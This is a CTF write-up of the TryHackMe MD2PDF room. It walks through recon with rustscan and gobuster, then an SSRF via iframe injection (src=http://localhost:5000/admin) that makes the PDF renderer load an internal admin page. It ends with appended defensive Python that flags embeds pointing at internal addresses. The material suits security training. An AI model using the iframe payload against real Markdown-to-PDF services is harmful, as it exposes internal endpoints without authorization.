THM WriteUP | MD2PDF

Professional pentester, technical writer, telegram channel owner
Intro
Hello ethical hackers! Today we are going to complete the MD2PDF room on TryHackMe. The lab is tagged: SSRF, XSS, MarkDown, PDF.
Recon
To avoid typing the IP again and again, I exported it as a variable in the current bash shell.
export IP=*.*.*.*
Then I scanned the host with rustscan.

We find SSH and HTTP. Go to the web service:

We see a very simple Markdown-to-PDF converter. Let's test it. While testing, run gobuster for directory discovery.

gobuster dir -u "http://$IP/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 50
Found something interesting

We don't actually have access to admin/.

If we analyze the error, we see that we need to make a request from localhost:5000.
Exploitation
Back in the MD editor, we try to exploit iframe injection:
<iframe src="http://localhost:5000/admin"></iframe>
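
A defensive check for the behaviour shown above, as an added example that is not part of the original write-up or the room's code: it scans the HTML produced from submitted Markdown for tags that would make the PDF renderer fetch a loopback or internal address. The function names and the attribute list are assumptions made for this illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that make a renderer fetch a URL (assumed list, not exhaustive).
URL_ATTRS = {"src", "href", "data", "action", "poster"}


def is_internal(url):
    """True if the URL's host is 'localhost' or a loopback/private/link-local IP."""
    host = urlsplit(url).hostname
    if host is None:
        return False  # relative URL: no host to evaluate
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; resolving it is out of scope for this check
    return addr.is_loopback or addr.is_private or addr.is_link_local


class EmbedFinder(HTMLParser):
    """Collects (tag, attribute, url) for every URL attribute with an internal host."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and is_internal(value.strip()):
                self.hits.append((tag, name, value.strip()))


def find_internal_embeds(html):
    """Run on the HTML rendered from user Markdown, before it reaches the PDF engine."""
    finder = EmbedFinder()
    finder.feed(html)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    # Constructed sample: the submission from this write-up plus a harmless image.
    sample = ('<iframe src="http://localhost:5000/admin"></iframe>'
              '<img src="https://example.com/logo.png">')
    for tag, attr, url in find_internal_embeds(sample):
        print(f"reject: <{tag} {attr}> points at internal address {url}")
```

This is a string-level check only and does not cover names that resolve to internal addresses. The sturdier fixes are to render with network access restricted and to stop treating "request came from localhost" as authorization for admin/.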





